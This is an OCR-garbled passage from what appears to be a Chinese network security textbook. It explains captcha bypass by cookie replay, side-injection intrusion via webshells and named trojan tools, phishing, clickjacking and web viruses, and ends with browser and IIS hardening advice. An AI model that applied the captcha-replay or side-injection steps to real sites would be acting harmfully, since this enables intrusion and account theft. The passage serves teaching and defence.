登录 WebQQ 的 时 候 需 要 输入 验证 码 ， 我 们 通过 抓 包 或 者 看 源 代 码 ， 可 以 知道 点 击 

“ 换 一 张 ”时 其 实 是 访问 了 这 个 URL: http://captcha.qq.com/getimage， 它 来 自 tencent http 

SerVer 。 尝试 几 个 需要 验证 码 的 页 面 ， 发 现 其 验证 码 依 然 是 通过 访问 
http://captchaqq.com/getimage 获得 的 。 当 然 也 有 例外 的 情况 ， 不 过 总 体 来 看 腾讯 验证 码 机 
制 的 框架 与 上 面 讨论 的 又 有 些 不 同 。 

如 图 5-12 所 示 ， 腾 讯 验证 码 机 制 在 这 种 框架 体系 下 ， 验 证 码 成 了 一 个 单独 的 组 件 ， 
不 同 服务 器 不 同 应 用 程序 都 可 使 用 它 提供 的 验证 码 服务 接口 。 


5-12 腾讯 验证 码 机 制 


下 面 继续 研究 腾讯 验证 码 的 具体 流程 。 

访问 http://captcha.qq.com/getimage， 看 到 “DPDQ” 验 证 码 图 片 ， 抓 包 ， 查 看 响应 
标 头 : 

键 值 

响应 HTTP/1.1 200 OK 

Server tencent http server 

Accept-Ranges bytes 

Pragma No-cache 

Content-Length 2559 

Set-Cookies 

verifysession=h00baf67a8fc83747a1866810d382c9974a398f290013d1ldldd61le42da 

69a207a35eld357a81f467874 

4;PATH=/; DOMAIN=qq。 com; 
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Connection close 

Content-Type image/jpeg 

以 上 就 是 HTTP 协议 中 的 header 内 容 ， 请 注意 其 中 Set-Cookies 的 部 分 ， 其 实 这 就 是 
验证 码 “zqcu” 字 符 串 经 过 加 密 后 的 密 文 。 当 用 户 提 交 验 证 码 时 ， 将 用 户 输入 的 
“DPDQ” 和 密 文 同时 提交 ， 然 后 服务 器 1、2 再 通过 服务 器 3 的 验证 接口 判断 是 否 正 
确 。 此 处 腾讯 验证 码 采 用 Cookies 方式 。 

那么 ， 接 下 来 通常 会 有 两 种 做 法 : 

e@ ”通过 模式 识别 辨认 出 图 片 所 承载 的 验证 码 字 符 串 ， 然 后 提交 的 时 候 直 接 发 送 识 别 

的 字符 串 。 

@ ”通过 解密 破译 出 verifysession 的 明文 。 

对 于 繁杂 的 Cookies MD5 加 密 方式 ， 破 解 起 来 非常 复杂 ， 可 以 选择 利用 Cookies 欺骗 
绕 过 验证 码 。 接 下 来 就 是 利用 Cookies 欺骗 绕 过 验证 码 。 

刚才 访问 http://captcha.qq.com/getimage 的 时 候 已 经 获得 一 个 验证 码 图 片 ， 知 道 它 的 验 
证 码 字符 串 为 “DPDQ”， 并 且 截 获 了 其 密 文 verifysession。 因 此 ， 尝 试 提交 “DPDQ” 并 
将 Cookies 设 为 已 知 的 verifysession， 然 后 查看 结果 。 

第 一 次 提交 的 时 候 ， 成 功 欺骗 了 服务 器 。 

当 再 次 使 用 这 一 组 验证 码 及 其 密 文 时 ， 服 务 器 返回 验证 码 错 误 的 提示 。 一 些 网 站 把 验 
证 码 设置 为 用 过 之 后 ， 不 能 马上 再 次 使 用 ， 也 许 要 过 1 分 钟 或 者 1 个 小 时 之 后 才能 使 用 。 
因此 ， 入 侵 者 通常 提前 获得 几 组 甚至 几 百 、 几 千 组 验证 码 ( 需 要 人 眼 识别 ， 人 手 输入 ) 及 其 
密 文 ， 而 且 所 获得 的 验证 码 还 不 能 闲置 太 长 时 间 。 


5.2.5” 旁 侵 ( 旁 注 ) 


旁 注 是 最 近 网 络 上 比较 流行 的 一 种 入 侵 方法 ， 在 字面 上 解释 就 是 “从 旁 注入 ”， 利 用 
同一 主机 上 面 不 同 网 站 的 漏洞 得 到 Webshell， 从 而 利用 主机 上 的 程序 或 者 是 服务 暴露 的 用 
户 所 在 的 物理 路 径 进行 入 侵 。 通 常 ， 旁 注入 侵 需 要 权限 的 提升 作为 帮助 ， 如 果 主 机 的 设置 
是 IS 单 用 户 权限 或 禁止 运行 任意 CMD 命令 的 话 ， 这 样 旁 注入 侵 就 成 了 一 大 难题 ， 没 有 
了 CMD 的 权限 就 很 难 进行 旁 注 的 信息 搜集 ， 最 主要 的 跨 站 式 (文件 夹 ) 的 入 侵 就 不 可 能 成 
功 。 所 以 在 得 到 Webshell 之 后 我 们 首先 要 确定 的 条 件 就 是 ， 是否 存在 可 执行 任意 CMD 的 
权限 或 是 否 可 以 有 FSO 的 权限 ， 这 两 个 是 旁 注 的 首要 条 件 。 在 对 虚拟 主机 网 站 进行 SQL 
注入 时 ， 通 过 whois 查询 ， 对 主机 上 的 其 他 站 点 进行 注入 ， 通 过 入 侵 其 他 站 点 ， 从 而 达到 
对 原 站 点 的 入 侵 ， 叫 做 旁 注 。 

在 网 络 上 对 于 WEB 服务 器 来 说 ， 旁 注 攻击 是 攻击 力 最 大 的 一 种 。Domain 是 旁 注 常 
用 的 攻击 工具 。 无 数 大 型 的 站 点 (甚至 黑客 站 点 ) 都 被 这 种 攻击 所 击 倒 。 因 为 一 个 网 站 所 在 
的 服务 器 很 可 能 存在 其 他 网 站 ， 当 这 个 网 站 因为 安全 措施 做 得 很 好 而 无 法 进行 攻击 时 ， 攻 
击 者 就 寻找 在 同一 服务 器 上 运行 的 其 他 网 站 进行 攻击 ， 这 样 最 终 可 以 同样 达到 获得 这 个 服 
务 器 权限 的 目的 ， 这 就 是 旁 注 的 核心 思想 所 在 。 

进行 旁 注 攻 击 时 ， 要 确定 服务 器 满足 以 下 条 件 : 

e ”可 执行 任意 CMD 命令 。 

@ 可 执行 FSO。 
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e@ 是否 IIS 单 用 户 权 限 。 

另外 ， 还 要 确定 网 站 所 在 物理 路 径 ， 因 为 我 们 旁 注 的 目的 是 借助 其 他 的 网 站 进入 主机 
内 部 ， 得 知 目标 所 在 的 文件 夹 路 径 ， 从 而 进入 ， 建 立新 的 Webshell。 所 以 ， 我 们 要 找寻 目 
标 网 站 所 在 的 物理 路 径 ， 就 必须 要 借助 主机 的 程序 或 者 是 服务 提供 的 信息 。 

以 下 就 是 会 暴露 物理 路 径 的 地 方 : 

e@ ”SERV-U 的 用 户 配置 文件 ServUDaemon.ini。 暴 露 用 户 的 FTP 密码 以 及 网 站 的 具 

体 地 址 。 

@ ”诺顿 的 杀毒 日 志 。 会 暴露 一 些 存 在 后 门 而 又 被 查 杀 的 网 站 路 径 。 

e@ “IIS 的 配置 文件 。 整 个 暴露 了 主机 的 IS 设置 以 及 ASP.DLL 的 问题 。 

@ 黑匣子。 整个 黑匣子 会 暴露 出 很 多 关于 HTTP 的 敏感 信息 。 

旁 注 入 侵 的 工具 ， 要 得 到 同一 服务 器 其 他 网 站 的 域名 就 需要 WHOIS 帮忙 了 ， 我 们 可 
以 使 用 桂林 老兵 编写 的 Domain 程序 或 者 是 到 whois.webhosting.info 网 站 进行 查找 ， 国 家 
级 域名 是 不 可 以 查询 的 ， 遇 到 这 些 问题 可 以 将 卫 查找 出 来 之 后 ， 直 接 WHOIS 我 们 刚刚 
得 到 的 卫 地 址 就 可 以 了 。 

Webshell， 至 于 如 何 得 到 我 们 需要 的 Webshell， 这 就 要 看 入 侵 的 对 象 以 及 自身 的 能 力 
了 ， 而 Webshell 我 是 选择 了 老兵 的 asp 站 长 助手 以 及 砍 客 C/S 的 ASP 木马 ， 进 行 整个 旁 
注 的 主要 Webshell。 首 先 查 询 主机 所 开 的 服务 以 及 是 否 禁止 CMD/FSO 的 时 候 都 可 以 在 砍 
客 木马 身上 得 到 我 们 需要 的 答案 ， 而 老兵 的 木马 因为 编写 以 及 程序 的 使 用 都 较为 直观 ， 特 
别 是 CMD 的 操作 是 最 好 的 。 

以 上 就 是 在 旁 注 的 时 候 ， 所 要 用 到 、 要 查询 的 信息 以 及 工具 。 

旁 注 是 一 种 新 生 的 入 侵 手法 ， 其 杀伤 力 远 远 超过 系统 的 漏洞 。 在 旁 注 的 过 程 中 可 以 加 
插 很 多 的 手法 ， 例 如 权限 的 提升 、 木 马 的 种 植 等 。 


5.3 ”Web 欺骗 与 防护 机 制 


Web 欺骗 允许 攻击 者 创造 整个 WWW 世界 的 影像 拷贝 。 影 像 Web 的 入 口 进入 到 攻击 
者 的 Web 服务 器 ， 经 过 攻击 者 机 器 的 过 滤 ， 人 允许 攻击 者 监控 受 攻击 者 的 任何 活动 ， 包 括 
账户 和 口令 。 攻 击 者 也 能 以 受 攻击 者 的 名 义 将 错误 或 者 易于 误解 的 数据 发 送 到 真正 的 Web 
服务 器 ， 以 及 以 任何 Web 服务 器 的 名 义 发 送 数据 给 受 攻击 者 。 简 而 言 之 ， 攻 击 者 观察 和 
控制 者 受 攻击 者 在 Web 上 做 的 “中 间 人 攻击 ”， 如 DNS 欺骗 、ARP 欺骗 等 。 

在 欺骗 攻击 中 ， 攻 击 者 创造 一 个 易于 误解 的 上 下 文 环境 ， 以 诱 使 受 攻击 者 进入 并 且 做 
出 缺乏 安全 考虑 的 决策 。 欺 骗 攻 击 就 像 是 一 场 虚拟 游戏 ， 攻 击 者 在 受 攻 击 者 的 周围 建立 起 
一 个 错误 但 是 令 人 信服 的 世界 。 


5.3.1 Web 欺骗 


在 Web 欺骗 中 受害 体 被 欺骗 这 是 攻击 者 的 第 一 步 。 攻 击 者 设法 欺骗 受害 体 进行 错误 
的 决策 ， 而 决策 的 正确 与 否决 定 了 安全 与 否 。 比 如 : 当 一 个 用 户 在 Intemet 下 载 一 个 软 
件 ， 系 统 的 安全 提示 你 ， 该 网 页 有 不 安全 控件 是 否 要 运行 ， 这 就 关系 到 了 用 户 选择 是 还 是 
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否 的 问题 。 而 在 安全 的 范围 里 ， 网 页 有 可 能 加 载 病毒 、 木 马 等 。 这 就 是 受害 体 决 策 的 问 
题 。 从 这 个 小 小 的 例子 中 我 们 不 难看 出 ， 受 害 体 在 决定 是 否 下 载 或 者 运行 软件 的 时 候 ， 或 
许 已 经 被 欺骗 。 一 种 盗 QQ 密码 的 软件 ， 和 腾讯 公司 的 图 标 一 样 ， 但 其 程序 却 指向 了 在 
后 台 运行 的 盗窃 软件 。 


1. Web 欺骗 掩盖 体 


在 Web 欺骗 中 我 们 把 攻击 者 用 来 制造 假象 、 进 行 欺骗 攻击 中 的 道具 称 为 掩盖 体 。 这 
些 道具 可 以 是 : 虚假 的 页 面 、 虚 假 的 连接 、 虚 假 的 图 表 、 虚 假 的 表单 等 。 攻 击 者 竭尽 全 力 
地 试图 制造 令 受 害 体 完全 信服 的 信息 ， 并 引导 受害 体 做 一 些 不 安全 的 操作 。 当 浏览 网 页 
时 ， 网 页 的 字体 、 图 片 、 色 彩 、 声 音 会 给 受害 体 传达 着 暗示 信息 。 甚 至 一 些 公 司 的 图 形 标 
志 也 给 受害 体 造成 了 思维 定 势 。 如 看 到 “小 狐狸 ”的 图 表 ， 就 想到 了 www.sohu.com 站 
点 。 攻 击 者 很 容易 制造 虚假 的 搜索 ， 受 害 体 往往 通过 强大 的 搜索 引擎 来 寻找 所 需要 的 信 
息 。 但 是 这 些 搜 索引 擎 并 没有 检查 网 页 的 真实 性 ， 明 明 标 着 A 站 点 的 标志 ， 但 是 连接 的 
却 是 B 站 点 。 而 且 B 站 点 有 着 和 A 站 点 网 页 相似 的 拷贝 。 

5-13 显示 了 国家 互联 网 中 心 (CNCERT/CC) 播 报 的 ， 仿 冒 中 国 几 大 银行 和 大 型 网 站 
网 页 的 虚假 域名 。 


ucnszx.xcvzxaaz.in、zhangshijie.3.sindns.info、www.bockk.com、 
行 | item.taobao.com.astm-esy10xv.tk、item.taobao.bacyou.com、 


item.taobao.com.cxghai.tk 、debcmimnsd.dmnxcunsad.ind.in 


ce3tvn9.com、 ce3tvn6.com、cn372.com、ntv355.com、 


cntvssm.com、 cntvccx.com、eeb88.com 


仿冒 湖南 卫视 | huuan2.com 


仿冒 搜狐 公司 | com2012win.com 


仿冒 其 他 网 站 | changijiang.tp82.com、hongyuan.tp82.com、hysecsoft.zd68.com 


图 5-13 国家 互联 网 中 心 公 布 的 虚假 网 站 
2. Web 欺骗 的 目的 


攻击 者 欺骗 的 目的 可 以 很 多 ， 但 是 最 终 的 目的 是 窃取 用 户 信息 ， 甚 至 一 些 银行 账户 和 
密码 。 例 如 ， 在 访问 网 上 银行 时 ， 通 过 所 见 的 银行 Web 页 面 输入 账号 和 密码 。 如 果 用 户 
访问 的 页 面 是 虚假 的 ， 账 号 和 密码 就 会 被 盗 。 

攻击 者 可 以 观察 或 者 修改 任何 从 受 攻击 者 到 Web 服务 器 的 信息 ; 同样 的 ， 也 控制 着 
从 Web 服务 器 至 受 攻击 者 的 返回 数据 ， 这 样 攻击 者 就 有 多 种 攻击 方式 ， 包 括 监 视 和 
破坏 。 

攻击 者 能 够 监视 受 攻击 者 的 网 络 信息 ， 记 录 他 们 访问 的 网 页 和 内 容 。 当 受 攻击 者 填写 
完 一 个 表单 并 发 送 后 ， 这 些 数据 将 被 传送 到 Web 服务 器 ，Web 服务 器 将 返回 必要 的 信 
息 ， 攻 击 者 完全 可 以 截获 并 加 以 使 用 。 大 部 分 提供 在 线 服 务 的 公司 使 用 表单 来 完成 业务 ， 
这 意味 着 攻击 者 可 以 获得 用 户 的 账户 和 密码 。 即 使 受 攻击 者 使 用 “安全 ”连接 (通常 是 通 
过 Secure Sockets Layer 来 实现 的 ， 用 户 的 浏览 器 会 显示 一 把 锁 或 钥匙 来 表示 处 于 安全 连 
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接 )， 也 无 法 逃脱 被 监视 的 命运 。 

在 得 到 必要 的 数据 后 ， 攻 击 者 可 以 通过 修改 受 攻击 者 和 Web 服务 器 之 间 任 何 一 个 方 
向 上 的 数据 ， 来 进行 某 些 破坏 活动 。 攻 击 者 可 以 修改 受 攻击 者 的 确认 数据 ， 例 如 ， 受 攻击 
者 在 线 订 购 某 个 产品 时 ， 攻 击 者 可 以 修改 产品 代码 、 数 量 或 者 邮购 地 址 等 。 攻 击 者 也 能 修 
改 被 Web 服务 器 所 返回 的 数据 ， 例 如 ， 插 入 易于 误解 或 者 攻击 性 的 资料 ， 破 坏 用 户 和 在 
线 公 司 的 关系 等 。 


3. Web 欺骗 的 方法 


Web 欺骗 是 一 种 电子 信息 欺骗 ， 攻 击 者 在 其 中 建立 了 一 个 令 人 信服 的 Web 页 面 , 但 
是 是 完全 错误 的 拷贝 。 错 误 的 Web 看 起 来 十 分 逼真 ， 它 拥有 相同 的 网 页 和 内 部 链接 。 然 
而 ， 攻 击 者 控制 着 错误 的 Web 站 点 ， 受 攻击 者 浏览 器 和 Web 之 间 的 所 有 网 络 信息 完全 被 
攻击 者 所 截获 ， 其 工作 原理 就 好 像 是 一 个 过 滤器 。 

如 图 5-14 用 户 访问 虚假 网 站 后 输入 账号 、 密 码 。 虚 假 网 站 记录 账号 、 密 码 并 转 跳 登 
录 真 网 站 。 用 户 在 转 跳 后 访问 的 全 为 真 网 站 ， 返 回信 息 也 是 真 网 站 返回 的 ， 用 户 很 难 察觉 
账号 已 经 泄露 。 


转 跳 到 真 网 站 ， 并 转发 和 记录 账号 


和 中 本 全 人 ( 假 网 页 ) ( 真 网 页 ) 
请 您 输入 您 的 账号 和 密码 : 请 您 输入 您 的 账号 和 密码 
用 
全 密码 : 密码 : 


返回 登陆 成 功 
5-14 ”用 户 登 录 页 面 转 跳 欺 骗 


国家 互联 网 中 心 CNCERT/CC 每 周 都 会 发 布 安全 周报 ， 每 周 都 会 出 现 一 些 虚假 网 
站 ， 它 们 模仿 网 银 页 面 、 在 线 支付 页 面 以 及 其 他 网 上 电子 货币 交易 的 登录 窗口 。 如 淘宝 的 
正常 登录 页 面 URL 是 : https://login.taobao.com/member/login.jhtml? 人 top&redirectURIL= 
http%3A%2F%2Fwww.taobao.com%2F， 而 伪造 的 淘宝 网 站 URL 是 : http://otem.taobao- 
com-ite.cz.cc/member/login.jhtml f top.Asp?u=admin( 该 伪造 网 站 已 经 失效 )。 

一 些 经 验 不 丰富 的 用 户 ， 可 能 会 分 辨 不 出 网 站 的 真实 性 ， 有 时 候 甚 至 一 些 老 网 民 也 会 
上 当 。 从 传播 途径 上 来 说 ， 钓 鱼网 站 多 种 多 样 。 

骗子 总 是 希望 能 骗 到 更 多 人 ， 对 于 很 多 网 游玩 家 也 许 深 有 体会 。 骗 子 很 多 在 游戏 中 冒 
充 客服 “喊话 ”， 通 过 各 种 理由 诱骗 用 户 去 登录 事先 做 好 的 钓鱼 网 站 ， 有 时 声称 : 游戏 官 
方正 在 搞活 动 发 放 “ 大 礼包 ”， 一 些 粗 心 的 玩家 往往 会 上 当 ， 主 动 到 钓鱼 网 站 登录 自己 的 
游戏 账号 。 到 此 ， 攻 击 者 就 成 功 盗 取 了 用 户 的 账号 和 密码 。 
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4. 点 击 动 持 欺骗 和 拖 搜 数据 获取 欺骗 


经 常 上 网 的 用 户 或 许 会 有 这 样 的 经 历 : 访问 过 一 些 网 页 ， 点 击 鼠 标 打 开 的 新 页 面 并 不 
是 用 户 的 意愿 ， 而 是 其 他 的 页 面 。 这 就 是 Web 的 一 种 欺骗 方式 “点 击 支持 ”， 点 击 支持 
是 一 种 视觉 上 的 欺骗 手段 。 攻 击 者 在 自 改 网 页 时 使 用 一 个 透明 的 、 不 可 见 的 iframe， 和 覆盖 
在 一 个 网 页 上 。 通 过 调整 iframe 位 置 ， 可 以 使 这 个 透明 的 过 ame 正好 覆盖 在 某 些 网 页 上 
的 功能 键 或 者 是 超级 链接 上 。 和 致使 用 户 点 击 链接 时 其 实 点 的 是 透明 的 过 ame 连接 ， 从 而 转 
跳 到 攻击 者 预先 设 定 的 页 面 。 

点 击 劫持 可 以 和 钓鱼 网 站 欺骗 结合 ， 攻 击 者 侵入 正规 网 站 ， 算 改 页 面 ， 通 过 点 击 劫持 
让 用 户 转 跳 到 攻击 者 的 钓鱼 网 站 上 ， 在 更 大 程度 上 增加 了 Web 浏览 的 恶意 欺骗 性 。 

拖 搜 劫持 获取 数据 是 用 户 在 网 页 上 娱乐 或 个 性 化 体验 的 同时 ， 不 知 不 觉 地 把 个 人 信 
息 ， 有 时 包括 Cookies 内 容 ， 发 送 给 了 攻击 者 。 


5. Web 病毒 


Web 病毒 是 利用 网 页 来 进行 破坏 的 病毒 ， 它 使 用 一 些 Script 语言 编写 的 恶意 代码 ， 利 
用 浏览 器 的 漏洞 来 实现 病毒 植 入 。 当 用 户 登录 某 些 含有 网 页 病毒 的 网 站 时 ， 网 页 病毒 便 被 
悄悄 激活 ， 这 些 病毒 一 旦 激活 ， 就 可 以 利用 系统 的 一 些 资源 进行 破坏 活动 。 轻 则 修改 用 户 
的 注册 表 ， 使 用 户 的 首页 、 浏 览 器 标题 改变 ， 重 则 可 以 关闭 系统 的 很 多 功能 : 植 入 木马 、 
感染 病毒 ， 致 使 用 户 无 法 正常 使 用 计算 机 系统 ， 更 有 甚 者 ， 进 行 更 为 严重 的 破坏 : 格式 化 
文件 系统 等 。 这 种 网 页 病毒 容易 编写 和 修改 ， 使 用 户 防 不 胜 防 。 

根据 目前 互联 网 上 流行 的 常见 网 页 病毒 的 作用 对 象 及 表现 特征 ， 可 以 将 网 页 病毒 归纳 
为 以 下 两 大 类 。 

(1) 通过 JavaScript、Applet、ActiveX 编辑 的 脚本 程序 修改 正 浏览 器 ， 常 见 的 修改 
形式 有 : 
修改 默认 主页 ， 默 认 首 页 。 
屏蔽 锁定 主页 设置 ， 且 设置 选项 无 效 不 可 改 回 。 
修改 默认 的 正 搜索 引擎 。 
在 正 标题 栏 、OE 标题 栏 添加 非法 信息 。 
鼠标 右键 菜单 被 添加 非法 网 站 广告 链接 。 
鼠标 右键 弹出 菜单 功能 被 禁用 失常 。 
正 收藏 夹 被 强行 添加 非法 网 站 的 地 址 链接 。 
在 正 工具 栏 非法 添加 按钮 。 
锁定 地 址 下 拉 菜 单 及 其 添加 文字 信息 。 

e@ 禁用 下 菜单 “查看 ”下 的 “ 源 文件 ”。 

(2) 通过 JavaScript、Applet、ActiveX 编辑 的 脚本 程序 修改 用 户 操作 系统 ， 其 表现 形 
式 和 危害 多 种 多 样 ， 常 见 的 有 : 

e ”开机 出 现 对 话 框 。 

@ 系统 正常 启动 后 ， 但 正 被 锁定 网 址 自动 调用 打开 。 

e ”格式 化 硬盘 。 


168 网 络 安全 与 管理 


e ”暗藏 恶意 病毒 ， 如 “万 花 谷 ” 蛤 蜡 病 毒 ， 全 方位 侵害 封杀 系统 ， 最 后 导致 系统 次 
痪 崩溃 。 
非法 读 取 或 盗 取 用 户 文件 。 
锁定 禁用 注册 表 。 
注册 表 被 锁定 禁用 之 后 ， 编 辑 * reg 注册 表 文件 打开 方式 错乱 。 
时 间 前 面 加 广告 。 
启动 后 首页 被 再 次 修改 。 
更 改 “ 我 的 电脑 ”下 的 一 系列 文件 夹 名 称 。 

Web 病毒 的 入 侵 过 程 如 下 : 

(1) 网 页 病毒 大 多 由 恶意 代码 、 病 毒 体 (通常 是 经 过 伪装 成 正常 图 片 文件 后 缀 的 .exe 
文件 ) 和 脚本 文件 或 Java 小 程序 组 成 ， 病 毒 制作 者 将 其 写 入 网 页 源 文件 。 

(2) 用 户 浏览 上 述 网 页 ， 病 毒 体 和 脚本 文件 以 及 正常 的 网 页 内 容 一 起 进入 计算 机 的 临 
时 文件 夹 。 

(3) 脚本 文件 在 显示 网 页 内 容 的 同时 开始 运行 ， 要 么 直接 运行 恶意 代码 ， 要 么 直接 执 
行 病毒 程序 ， 要 么 将 伪装 的 文件 还 原 为 .exe 文件 后 再 执行 。 执 行 任务 包括 : 完成 病毒 入 
驻 、 修 改 注册 表 、 媒 入 系统 进程 、 修 改 硬盘 分 区 属性 等 。 

(4) 网 页 病毒 完成 入 侵 ， 在 系统 重启 后 病毒 体 自我 更 名 、 复 制 、 再 伪装 ， 接 下 来 的 破 
坏 依 病毒 的 性 质 正式 开始 。 

网 页 病毒 的 工作 或 称 其 为 遗传 结构 是 简单 的 ， 但 这 便 意 味 着 它们 能 迅速 变异 。 

既然 是 网 页 病毒 ， 简 单 地 说 ， 就 是 一 个 网 页 。 但 在 这 个 网 页 运行 于 本 地 时 ， 它 所 执行 
的 操作 就 不 仅仅 是 下 载 后 再 读 出 ， 伴 随 着 操作 的 背后 ， 还 有 病毒 原 体 软 件 的 下 载 或 是 木马 
的 下 载 ， 然 后 执行 ， 悄 悄 地 修改 系统 配置 或 注册 表 信息 。 为 了 吸引 受害 者 ， 这 类 网 页 一 般 
都 有 一 些 共同 的 特征 : 

(1) 美丽 的 网 页 名 称 ， 以 及 利用 浏览 者 的 无 知 。 

(2) 诱惑 性 的 信息 或 故意 隐藏 信息 ， 利 用 浏览 者 的 好 奇 心 。 

(3) 利用 浏览 者 的 无 意识 。 


5.3.2 ”Web 欺骗 的 预防 


目前 ， 钓 鱼 与 欺诈 已 经 成 为 互联 网 最 严重 的 威胁 之 一 。 在 金山 公司 安全 中 心 发 布 的 
《2010 年 中 国 网 络 购物 报告 》 中 指出 ， 有 超过 1 亿 用 户 遭 遇 过 网 络 陷阱 ， 直 接 经 济 损失 
将 突破 150 亿 元 。 而 中 国 的 网 民 在 2011 年 才刚 刚 突破 4 亿 。 在 这 样 的 恶劣 环境 下 ， 如 何 
对 抗 钓鱼 的 问题 ， 就 显得 尤为 重要 了 。 

1. 逃离 灾难 

受 攻 击 者 可 以 自觉 与 不 自觉 地 离开 攻击 者 的 错误 Web 页 面 。 这 里 有 若干 种 方法 。 访 
问 Bookmark 或 使 用 浏览 器 中 提供 的 Open location 进入 其 他 Web 页 面 ， 离 开 攻 击 者 所 设 


下 的 陷阱 。 不 过 ， 如 果 用 户 使 用 Back 键 ， 则 会 重新 进入 原先 的 错误 Web 页 面 。 当 然 ， 如 
果 用 户 将 所 访问 的 错误 Web 存 入 Bookmark， 那 么 下 次 可 能 会 直接 进入 攻击 者 所 设 下 的 
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陷阱 。 
2. 追踪 攻击 者 


有 人 建议 应 当 通过 跟踪 来 发 现 并 处 罚 攻击 者 。 确 实 如 此 ， 攻 击 者 如 果 想 进行 Web 欺 
骗 的话 ， 那 么 离 不 开 Web 服务 器 的 帮助 。 但 是 ， 他 们 利用 的 Web 服务 器 很 可 能 是 被 攻击 
后 的 产物 ， 就 像 罪 犯 驾驶 着 盗窃 来 的 汽车 去 作案 一 样 。 


3. 安全 配置 浏览 器 


改变 浏览 器 ， 使 之 具有 反映 真实 URL 信息 的 功能 ， 而 不 会 被 蒙蔽 ， 如 现在 的 浏览 器 
中 基于 下 内 核 的 360 安全 浏览 器 、 搜 狗 浏览 器 ;以 及 火狐 浏览 器 都 带 有 了 “安全 标识 ” 
或 其 他 相似 功能 。 该 功能 允许 浏览 器 将 用 户 访问 的 网 页 URL 提交 给 官方 DNS， 并 校对 网 
站 域名 地 址 的 合法 性 和 安全 性 ， 如 果 是 非法 网 站 域名 或 不 安全 域名 就 会 给 用 户 发 出 警告 。 

另外 ， 还 可 以 通过 禁用 浏览 器 中 的 JavaScript 功能 ， 禁 止 各 种 形式 的 改写 信息 ， 提 高 
Web 的 安全 性 。 当 然 ， 使 用 该 配置 ， 用 户 会 损失 一 些 正常 功能 。 

对 于 通过 安全 连接 建立 的 Web 与 浏览 器 对 话 ， 浏 览 器 还 应 该 告诉 用 户 谁 在 另 一 端 ， 
而 不 只 是 表明 一 种 安全 连接 的 状态 ， 如 ， 在 建立 了 安全 连接 后 ， 给 出 一 个 提示 信息 
“NetscapeInc.” 等 。 


4. 防范 网 页 病毒 代码 


普通 病毒 侵入 计算 机 的 方式 虽然 复杂 ， 但 只 要 堵 住 漏洞 ， 不 被 他 人 有 意 将 病毒 复制 进 
入 ， 或 者 不 下 载 和 打开 陌生 文件 、 邮 件 ， 还 是 能 够 避免 的 。 而 网 页 病毒 则 是 通过 浏览 网 页 
侵入 ， 人 们 无 从 识别 难以 防范 。 

对 付 网 页 病毒 可 以 采用 脚本 监控 技术 。 现 在 的 杀毒 软 都 带 有 “网 页 防护 ”和 “脚本 防 
护 ” 技 术 监控 ， 而 且 对 脚本 服务 模块 进行 多 层次 处 理 ， 一 方面 保障 脚本 文件 在 所 有 浏览 器 
中 正常 启用 ， 一 方面 切断 脚本 文件 携带 病毒 入 侵 的 一 切 可 能 路 径 。 

虽然 网 页 病毒 可 以 通过 杀毒 软件 杀 灭 ， 但 是 杀毒 软件 对 网 页 病毒 反应 慢 。 对 此 只 能 尽 
量 不 要 浏览 不 熟悉 的 网 站 ， 不 少 网 站 专门 登 出 恶意 网 站 地 址 以 提醒 大 家 注意 。 


5.4 ”Web 服务 器 安全 机 制 


5.4.1 ”对 于 单独 服务 器 IIS 安全 配置 


JIS(Internet Information Server) 作 为 当今 流行 的 Web 服务 器 之 一 ， 提 供 了 强大 的 
Intemet 和 Intranet 服务 功能 。 如 何 加 强 IS 的 安全 机 制 ， 建 立 高 安全 性 能 的 可 靠 的 Web 服 
务 器 ， 已 成 为 网 络 管理 的 重要 组 成 部 分 。 


1. 应 用 NTFS 文件 系统 


NTFS 文件 系统 可 以 对 文件 和 目录 进行 管理 ，FAT 文件 系统 则 只 能 提供 共享 级 的 安 
全 ， 而 Windows NT 的 安全 机 制 是 建立 在 NTFS 文件 系统 之 上 的 ， 所 以 在 安装 Windows 
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NT 时 最 好 使 用 NTFS 文件 系统 ， 否 则 将 无 法 建立 NT 的 安全 机 制 。 
2. 共享 权限 的 修改 


在 系统 默认 情况 下 ， 每 建立 一 个 新 的 共享 ，Everyone 用 户 就 享有 “完全 控制 ”的 共享 
权限 ， 因 此 ， 在 建立 新 的 共享 后 应 该 立即 修改 Everyone 的 默认 权限 ， 如 图 5-15 所 示 。 根 
据 实际 需求 对 用 户 的 权限 进行 修改 。 


5-15 设置 文件 夹 共享 权限 


3. 为 系统 管理 员 账号 更 名 


域 用 户 管理 器 虽 可 限制 猜测 口令 的 次 数 ， 但 对 系统 管理 员 账 号 (Administrator) 却 无 法 
限制 ， 这 就 可 能 给 非法 用 户 攻 击 管理 员 账 号 口令 带 来 机 会 ， 通 过 域 用 户 管理 器 对 管理 员 账 
号 更 名 不 失 为 一 种 好 办 法 。 具 体 设置 方法 如 下 : 

选择 “我 的 电脑 ”右键 一“ 管理 ”一 打开 “本 地 用 户 和 组 ”一 选中 Administrator( 管 
理 员 账 号 ) 右 键 一 “ 重 命名 ”命令 ， 对 其 进行 修改 ， 如 图 5-16 所 示 。 


4. 取消 TCP/IP 上 的 NetBIOS 绑 定 


NT 系统 管理 员 可 以 通过 构造 目标 站 名 NetBIOS 与 其 IP 地 址 之 间 的 映像 ， 对 Internet 
或 Intranet 上 的 其 他 服务 器 进行 管理 ， 但 非法 用 户 也 可 从 中 找到 可 乘 之 机 。 如 果 这 种 远程 
管理 不 是 必须 的 ， 就 应 该 立即 取消 (通过 网 络 属性 的 绑 定 选项 ， 取 消 NetBIOS 与 TCP/IP 之 
间 的 绑 定 )。 

操作 : 选择 “网 上 邻居 ”右键 一 “本 地 连接 ”右键 一 “Intemet 协议 (TCP/IP)” 一 ” 属 
性 ”按钮 一 “高 级 ”按钮 ， 在 打开 的 “高 级 TCP/IP 设置 ”对 话 框 的 WINS 选项 卡 中 选中 
“禁用 TCP/IP 上 的 NetBIOS” 单 选 按钮 ， 如 图 5-17 所 示 。 
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和 ( 域 ) 的 内 置 帐 F 

于 运行 ASP.NET 辅助 进程 (aspr 
供 来 宾 访 问 计算 机 或 访问 域 的 内 
匿名 访问 Internet 信息 服务 的 内 


用 于 启动 进程 外 应 用 程序 的 Inte 


于 命名 当前 选择 。 T T 


于 设置 | ms WIS | 过 项 | 
YINS 地 址 ( 控 使 用 磊 序 排列 ) @) : 


EL | 仿生 世 ) | Bidy | 


如果 启用 UMDSTS 查找 , 它 将 应 用 于 所 有 局 用 TCP/IP 的 连接 。 


厅 启用 LihnsTS 查找 已) 导入 LUINDSTS 仙 ) | 


图 5-17 取消 NetBIOS 绑 定 
5. 安装 时 应 注意 的 安全 问题 
